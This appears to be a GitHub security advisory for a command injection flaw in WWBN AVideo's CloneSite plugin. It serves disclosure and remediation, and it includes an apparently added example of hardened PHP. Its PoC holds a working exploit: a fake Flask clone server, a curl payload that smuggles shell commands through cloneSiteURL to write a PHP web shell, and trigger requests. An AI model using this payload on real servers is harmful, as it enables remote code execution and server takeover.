GHSA-XR6F-H4X7-R6QP

Vulnerability from github – Published: 2026-04-16 21:25 – Updated: 2026-04-16 21:25
Summary
WWBN AVideo: RCE cause by clonesite plugin
Details

Description

Summary

The cloneServer.json.php endpoint in the CloneSite plugin constructs shell commands using user-controlled input (url parameter) without proper sanitization. The input is directly concatenated into a wget command executed via exec(), allowing command injection.

An attacker can inject arbitrary shell commands by breaking out of the intended URL context using shell metacharacters (e.g., ;). This leads to Remote Code Execution (RCE) on the server.

Details

Line 112 of plugin/CloneSite/cloneClient.json.php does not sanitize the value properly:

$objClone->cloneSiteURL = str_replace("'", '', escapeshellarg($objClone->cloneSiteURL));

The str_replace call strips the single quotes that escapeshellarg adds, so the value reaches the shell unquoted and an attacker can inject a malicious cloneSiteURL to achieve RCE:

$sqlURL = "{$objClone->cloneSiteURL}videos/clones/{$json->sqlFile}"; // line 116
$cmd = "wget -O {$sqlFile} {$sqlURL}"; // line 117
exec($cmd . " 2>&1", $output, $return_val); // line 119

The attack flow:

  1. Set up a malicious site that serves the clone data.

  2. Set the malicious URL via objects/pluginAddDataObject.json.php.

  3. Access plugin/CloneSite/cloneClient.json.php to trigger the RCE.

PoC

Create the malicious site with Python, for example:

from flask import Flask, jsonify, request

app = Flask(__name__)

@app.route('/', defaults={'path': ''})
@app.route('/<path:path>')
def catch_all(path):
    print("PATH:", path)


    return jsonify({
            "error": False,
            "msg": "",
            "url": "http://target-site.com/",
            "key": "target_clone_key",
            "useRsync": 0,
            "videosDir": "/var/www/html/AVideo/videos/",
            "sqlFile": "Clone_mysqlDump_evil123.sql",
            "videoFiles": [],
            "photoFiles": []
        })



if __name__ == '__main__':
    app.run(host='0.0.0.0', port=8071)

Set the URL to a payload like the following (requires an admin session):

curl -b 'PHPSESSID=<admin_session>' \
-X POST "http://127.0.0.1/objects/pluginAddDataObject.json.php" \
  -H "Content-Type: application/json" \
  -d '{
    "cloneSiteURL":"http://127.0.0.1:8071/;echo${IFS}\"<?=system(\\$_POST[1])?>\"${IFS}>1.php;/",
    "cloneSiteSSHIP":"127.0.0.1",
    "cloneSiteSSHUser":"1",
    "cloneSiteSSHPort":"22",
    "cloneSiteSSHPassword":{
        "type":"encrypted",
        "value":"cU1SVkhSVkxqMmxDZlUrSFhNZnRvcFBtTmI3UXNGZ0VFVWxlLzdJL0pjWGFiVXgyb2Iyci9OOE5LN0p6TmN6Zg=="
    },
    "useRsync":true,
    "MaintenanceMode":false,
    "myKey":"ba882541262f3202ee5a5ad790ae5b70"
}' 
#inject evil code
curl "http://127.0.0.1/plugin/CloneSite/cloneClient.json.php" #trigger rce to write 1.php
curl "http://127.0.0.1/plugin/CloneSite/1.php" \
 -d '1=id'
 #uid=33(www-data) gid=33(www-data) groups=33(www-data) uid=33(www-data) gid=33(www-data) groups=33(www-data)

This payload creates a web shell.

Then access plugin/CloneSite/cloneClient.json.php.

1.php will be created.

Impact

  • Remote Code Execution: An attacker can write arbitrary PHP code to any writable web-accessible directory, achieving full server compromise.

  • Full server compromise: With arbitrary PHP execution as the web server user, the attacker can read/modify the database, access all user data, pivot to other services, and potentially escalate privileges on the host.

Recommended Fix

Apply stronger sanitization to $objClone->cloneSiteURL.
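The quote-stripping pattern from the Details section next to a hardened way to build the same wget command, as an added example that is neither AVideo's code nor the upstream fix. The function names, the clone.example host and the /tmp/clones directory are assumptions made for illustration.

```php
<?php
// Added example, not AVideo code. Function names below are hypothetical.

// The pattern from line 112: the quoting added by escapeshellarg() is
// removed again, so shell metacharacters in the value are left unprotected.
function vulnerableArg(string $url): string
{
    return str_replace("'", '', escapeshellarg($url));
}

// Hardened form: allowlist the URL and file name, then quote each complete
// argument exactly once and never post-process the quoted result.
function buildWgetCommand(string $baseUrl, string $sqlFileName, string $destDir): string
{
    // Scheme, host, optional port and a path made of unreserved characters only.
    $urlPattern = '#^https?://[A-Za-z0-9.\-]+(:\d{1,5})?(/[A-Za-z0-9._~/\-]*)?$#D';
    if (!preg_match($urlPattern, $baseUrl)) {
        throw new InvalidArgumentException('cloneSiteURL rejected');
    }
    // sqlFile comes from the remote site's JSON, so it is untrusted as well.
    if (!preg_match('/^[A-Za-z0-9._-]+\.sql$/D', $sqlFileName)) {
        throw new InvalidArgumentException('sqlFile rejected');
    }
    $url  = rtrim($baseUrl, '/') . '/videos/clones/' . $sqlFileName;
    $dest = rtrim($destDir, '/') . '/' . $sqlFileName;
    // "--" ends option parsing so a value can never be read as a wget flag.
    return 'wget -O ' . escapeshellarg($dest) . ' -- ' . escapeshellarg($url);
}

// Constructed sample input containing a shell metacharacter.
$constructed = 'http://clone.example/;echo INJECTED;/';

// With the quotes stripped, the ';' separators are visible to the shell.
echo 'wget -O out.sql ' . vulnerableArg($constructed) . "videos/clones/x.sql\n";

// A well-formed URL produces a command with both arguments quoted.
echo buildWgetCommand('https://clone.example/', 'Clone_mysqlDump_abc.sql', '/tmp/clones'), "\n";

// The constructed input fails the allowlist before any command is built.
try {
    buildWgetCommand($constructed, 'Clone_mysqlDump_abc.sql', '/tmp/clones');
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```

Quoting each argument once with escapeshellarg is what keeps the shell from interpreting the value; the allowlist is an extra layer that also rejects URLs the clone feature has no reason to accept.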


{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "wwbn/avideo"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "29.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-78"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-16T21:25:19Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "id": "GHSA-xr6f-h4x7-r6qp",
  "modified": "2026-04-16T21:25:20Z",
  "published": "2026-04-16T21:25:19Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-xr6f-h4x7-r6qp"
    },
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/commit/473c609fc2defdea8b937b00e86ce88eba1f15bb"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/WWBN/AVideo"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "WWBN AVideo: RCE cause by clonesite plugin"
}

